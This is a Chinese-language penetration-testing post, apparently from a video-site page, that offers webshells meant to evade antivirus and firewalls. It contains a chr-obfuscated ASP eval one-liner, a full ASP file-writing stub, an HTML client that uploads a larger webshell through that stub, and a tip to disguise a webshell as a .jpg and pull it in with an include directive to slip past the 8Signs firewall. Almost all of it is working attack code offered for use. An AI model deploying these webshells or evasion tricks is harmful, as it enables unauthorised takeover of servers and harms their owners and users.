渗透测试 - 突破防火墙免杀一句话 -cracer哔哩哔哩
asp免杀一句话<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>
复制代码穿透防火墙的bs小马
服务器装有 8Signs Firewall 防火墙的,PHP、ASP、ASPX 很多小马大马都不能用,所以这里推荐用BS 的马。。。
小马的接收端:
--------------------------------------
<%
On Error Resume Next
set gl=server.CreateObJeCt("Adodb.Stream")
gl.Open
gl.Type=2
gl.CharSet="gb2312"
gl.writetext request("code")
gl.SaveToFile server.mappath(request("path")),2
gl.Close
set gl=nothing
response.redirect request("path")
%>
-----------------------------------------------------
小马的发送端,aspshelluP.Html:
------------------------------------------------------
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Asp shell up Client</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px;}textarea { font-family: "Courier New";}td { border-right-width: 1px; border-bottom-width: 1px; border-right-style: solid; border-bottom-style: solid; border-top-color: #d8d8f0;}.trHead { background-color: #e4e4f3; line-height: 3px;}.STYLE5 {font-family: Arial, Helvetica, sans-serif; font-size: 11pt;}
</style>
<body>
<table width="780" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="22" class="td" align="center" > <span class="STYLE5">Asp shell up Client </span> </td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<td align="center" class="td"> </td>
<tr>
<td height="18" align="center" class="td">
<FORM method=post target=_blank>ShellUrl: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=58 value=http://127.0.0.1/s.asp name=act> Path: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=8 value="4.txt" name=path> <INPUT onClick="Javascipt:name=path.value;action=document.all.act.value;submit();" type=button value="Submit" name=Send><BR>
发送的webshell代码:
<BR><TEXTAREA style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" name=code rows=20 cols=85></TEXTAREA>
</FORM>
</td>
</tr>
<tr>
<td align="right" class="td"> Powered By <a href="#" title="点击复制服务端到剪贴版" onclick='window.clipboardData.setData("text","\<%\nOn Error Resume Next\nset gl=server.CreateObJeCt(\"Adodb.Stream\") \ngl.Open \ngl.Type=2\ngl.CharSet=\"gb2312\" \ngl.writetext request(\"code\")\ngl.SaveToFile server.mappath(request(\"path\")),2 \ngl.Close \nset gl=nothing \nresponse.redirect request(\"path\")\n%\>");alert("\服务端已成功复制到剪贴")'>[Copy code]</a> 4ngr7 </td>
</tr><tr><td class="trHead"> </td></tr>
</table>
</body>
</html>
复制代码还有就是先把你需要上传的大马名字改为xxx.jpg一些防火墙不检测图片的。
然后新建一个ASP内容为内容是<!--#include file="xxx.jpg" -->
之后就成功包含了!
